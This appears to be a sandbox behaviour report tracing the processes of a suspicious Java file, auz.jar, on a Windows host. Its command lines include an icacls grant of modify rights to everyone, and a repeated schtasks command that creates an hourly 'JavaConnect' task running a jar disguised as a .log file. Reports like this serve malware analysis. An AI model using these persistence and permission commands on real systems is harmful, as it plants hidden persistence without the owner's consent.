                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:11:38:37
                        Start date:05/04/2023
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\auz.jar"" >> C:\cmdlinestart.log 2>&1
                        Imagebase:0xd90000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:1
                        Start time:11:38:38
                        Start date:05/04/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c72c0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:2
                        Start time:11:38:38
                        Start date:05/04/2023
                        Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\auz.jar"
                        Imagebase:0x1220000
                        File size:192376 bytes
                        MD5 hash:28733BA8C383E865338638DF5196E6FE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Java
                        Reputation:high

                        Target ID:3
                        Start time:11:38:40
                        Start date:05/04/2023
                        Path:C:\Windows\SysWOW64\icacls.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                        Imagebase:0x1270000
                        File size:29696 bytes
                        MD5 hash:FF0D1D4317A44C951240FAE75075D501
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:4
                        Start time:11:38:40
                        Start date:05/04/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c72c0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:5
                        Start time:11:38:41
                        Start date:05/04/2023
                        Path:C:\Windows\SysWOW64\tasklist.exe
                        Wow64 process (32bit):true
                        Commandline:tasklist
                        Imagebase:0x12e0000
                        File size:79872 bytes
                        MD5 hash:6B7D2FC3FB98B10A5F77B23DEF745F6F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Target ID:6
                        Start time:11:38:41
                        Start date:05/04/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c72c0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:7
                        Start time:11:38:43
                        Start date:05/04/2023
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd /c schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60
                        Imagebase:0x7ff7c72c0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:8
                        Start time:11:38:43
                        Start date:05/04/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c72c0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:9
                        Start time:11:38:43
                        Start date:05/04/2023
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60
                        Imagebase:0x50000
                        File size:185856 bytes
                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:10
                        Start time:11:38:44
                        Start date:05/04/2023
                        Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log
                        Imagebase:0xa10000
                        File size:192376 bytes
                        MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        Target ID:11
                        Start time:11:38:47
                        Start date:05/04/2023
                        Path:C:\Windows\SysWOW64\tasklist.exe
                        Wow64 process (32bit):true
                        Commandline:tasklist
                        Imagebase:0x12e0000
                        File size:79872 bytes
                        MD5 hash:6B7D2FC3FB98B10A5F77B23DEF745F6F
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        Target ID:12
                        Start time:11:38:47
                        Start date:05/04/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c72c0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        Target ID:13
                        Start time:11:38:47
                        Start date:05/04/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:reg query "HKU\S-1-5-19"
                        Imagebase:0xfc0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:14
                        Start time:11:38:47
                        Start date:05/04/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff61e220000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:15
                        Start time:11:38:48
                        Start date:05/04/2023
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd /c schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60
                        Imagebase:0xd90000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        Target ID:16
                        Start time:11:38:49
                        Start date:05/04/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c72c0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        Target ID:17
                        Start time:11:38:49
                        Start date:05/04/2023
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60
                        Imagebase:0x50000
                        File size:185856 bytes
                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        Target ID:18
                        Start time:11:38:50
                        Start date:05/04/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:reg query "HKU\S-1-5-19"
                        Imagebase:0xfc0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        Target ID:19
                        Start time:11:38:50
                        Start date:05/04/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c72c0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        No disassembly